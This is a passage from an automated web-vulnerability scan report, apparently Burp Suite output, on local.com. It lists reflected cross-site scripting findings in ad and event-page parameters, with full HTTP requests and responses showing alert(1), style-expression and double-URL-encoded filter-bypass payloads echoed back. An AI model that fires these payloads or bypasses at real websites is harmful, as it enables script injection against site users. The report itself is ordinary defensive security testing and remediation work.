The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

4.467. http://www.local.com/dart/ [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.468. http://www.local.com/dart/ [t parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8;tile=858aaf';b65e854cbc0;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

4.469. http://www.local.com/dart/ [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

4.470. http://www.local.com/dart/ [zone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c was submitted in the zone parameter. This input was echoed as 15298"><script>alert(1)</script>ffbd7ca082c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_1502010015298%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253effbd7ca082c HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1107
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1107


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.sp/retail_banks_1502010015298"><script>alert(1)</script>ffbd7ca082c;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" target="_blank">
...[SNIP]...

4.471. http://www.local.com/dart/ [zone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the zone request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b was submitted in the zone parameter. This input was echoed as fc52c';alert(1)//d85ccbd701b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the zone request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /dart/?ag=True&css=banner&p=locm.sp&pos=1&t=1&sz=728x90&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100fc52c%2527%253balert%25281%2529%252f%252fd85ccbd701b HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 1062
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:25:17 GMT
Connection: close
Content-Length: 1062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100fc52c';alert(1)//d85ccbd701b;dcopt=ist;kw=banks;pos=1;tile=1;cat=financial_services;city=dallas_tx;sz=728x90;ord=1296748812638?" type="text/javascript">
...[SNIP]...

4.472. http://www.local.com/events/category/music/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e7'-alert(1)-'22f4ee6710f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/music/dallas-tx.aspx?8c9e7'-alert(1)-'22f4ee6710f=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92920
Date: Thu, 03 Feb 2011 16:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:57 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=music&8c9e7'-alert(1)-'22f4ee6710f=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.473. http://www.local.com/events/category/performing-arts/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60e4c'-alert(1)-'1c8163cafb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /events/category/performing-arts/dallas-tx.aspx?60e4c'-alert(1)-'1c8163cafb2=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87882
Date: Thu, 03 Feb 2011 16:51:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:17 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
<a href="/events/events_map.aspx?location=dallas%2c+tx&category=performing_arts&60e4c'-alert(1)-'1c8163cafb2=1" omn_key="EES1:107:1:1118" onclick="return loc_click(this);">
...[SNIP]...

4.474. http://www.local.com/events/category/sports/dallas-tx.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d6b'-alert(1)-'8080df3d42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

